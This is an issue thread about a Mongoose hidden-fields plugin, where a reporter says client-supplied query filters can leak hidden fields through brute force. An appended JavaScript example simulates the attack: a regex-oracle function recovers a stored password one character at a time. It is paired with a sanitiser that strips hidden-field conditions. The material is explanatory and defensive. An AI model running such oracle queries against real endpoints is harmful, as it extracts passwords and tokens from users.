Closed SirTangent closed 4 years ago
Can you elaborate a bit on the "passing of query objects"?
Do you mean that the user could set a field as `{ hidePassword: false }`,
or what is the scenario you are describing?
If so can you elaborate on the problem (by example) and your proposal (if you have one)?
Thanks for submitting the issue.
I'm not clearly seeing the purpose of this within the domain of this plug-in. It seems more a concern in your controllers.
With no further elaboration provided I'm closing the issue.
I found a potential security vulnerability if you allow clients to pass query objects. The library allows for queries of documents that meet conditions for hidden fields, which can expose values to the client through brute force.
The easiest fix I'm using is to deconstruct the hidden fields from the query object beforehand.
However, I'm wondering if it would be useful for the library to have deconstruction built in for mongoose queries, therefore adding more security. Not sure if there is another addon for it.
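The attack and the fix described in the issue, as an added example that is not code from the issue, its author, or the plugin. It assumes a hypothetical `HIDDEN` list of field names the plugin strips from responses, and it simulates a small users collection and a subset of MongoDB filter semantics in memory so that it runs offline; `bruteForce` and `stripHidden` are names chosen here, not plugin APIs. The point it shows: hiding a field from the response does nothing if the client can still put a condition on that field in the filter, because an anchored `$regex` on a hidden value (a password hash, a reset token) turns "did a document come back" into a one-character-at-a-time oracle.

```javascript
// Added example (not code from the issue or from the plugin). It assumes a
// hypothetical HIDDEN list of field names the plugin strips from responses,
// and simulates a Mongo collection in memory so it runs offline.

const HIDDEN = ["password", "resetToken"];

// Constructed sample data standing in for a users collection.
const USERS = [
  { _id: 1, email: "alice@example.test", password: "s3cretHash" },
  { _id: 2, email: "bob@example.test", password: "hunter2" },
];

// Tiny subset of MongoDB filter semantics: equality, $regex, $and/$or.
function matches(doc, query) {
  return Object.entries(query).every(([key, cond]) => {
    if (key === "$and") return cond.every((q) => matches(doc, q));
    if (key === "$or") return cond.some((q) => matches(doc, q));
    const value = doc[key];
    if (cond !== null && typeof cond === "object" && "$regex" in cond) {
      return typeof value === "string" && new RegExp(cond.$regex).test(value);
    }
    return value === cond;
  });
}

// The vulnerable "endpoint": returns matching docs with hidden fields removed
// from the output, but applies the client's filter unchanged.
function find(query) {
  return USERS.filter((d) => matches(d, query)).map((d) => {
    const copy = { ...d };
    for (const h of HIDDEN) delete copy[h];
    return copy;
  });
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Attacker side: recover the hidden field one character at a time using
// anchored $regex conditions on it, observing only whether a doc came back.
// Returns null if the endpoint does not actually filter on the field.
const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
function bruteForce(findFn, email, field, maxLen = 64) {
  // Oracle check: a regex that can never match must yield no document;
  // if a document still comes back, the condition is being ignored.
  if (findFn({ email, [field]: { $regex: "(?!)" } }).length > 0) return null;
  let known = "";
  for (let i = 0; i < maxLen; i++) {
    const next = [...ALPHABET].find(
      (c) => findFn({ email, [field]: { $regex: "^" + escapeRegex(known + c) } }).length > 0
    );
    if (next === undefined) break; // no char extends the prefix: value is complete
    known += next;
  }
  return known;
}

// Fix from the issue: strip conditions on hidden fields from the client's
// query before it reaches Mongoose. Recurses into $and/$or/$nor and drops
// $where/$expr, which can reference a field without naming it as a key.
function stripHidden(query) {
  const out = {};
  for (const [key, value] of Object.entries(query)) {
    if (key === "$and" || key === "$or" || key === "$nor") {
      const kept = value.map(stripHidden).filter((q) => Object.keys(q).length > 0);
      if (kept.length > 0) out[key] = kept;
    } else if (key === "$where" || key === "$expr") {
      continue;
    } else if (!HIDDEN.some((h) => key === h || key.startsWith(h + "."))) {
      out[key] = value;
    }
  }
  return out;
}

// Hardened endpoint: same projection, but the filter is sanitised first.
function safeFind(query) {
  return find(stripHidden(query));
}

console.log(bruteForce(find, "alice@example.test", "password"));     // "s3cretHash"
console.log(bruteForce(safeFind, "alice@example.test", "password")); // null
```

Stripping silently, as above, matches what the issue proposes; the stricter variant is to reject the request (HTTP 400) when the client's filter names a hidden field at all, or to allowlist the fields a client may filter on rather than denylisting the hidden ones. Either way the check has to run on the filter itself (including dotted sub-paths and the `$and`/`$or`/`$nor`/`$where`/`$expr` cases handled here), not only on the documents returned, and it does not cover aggregation pipelines or sort/projection arguments if the controller exposes those too.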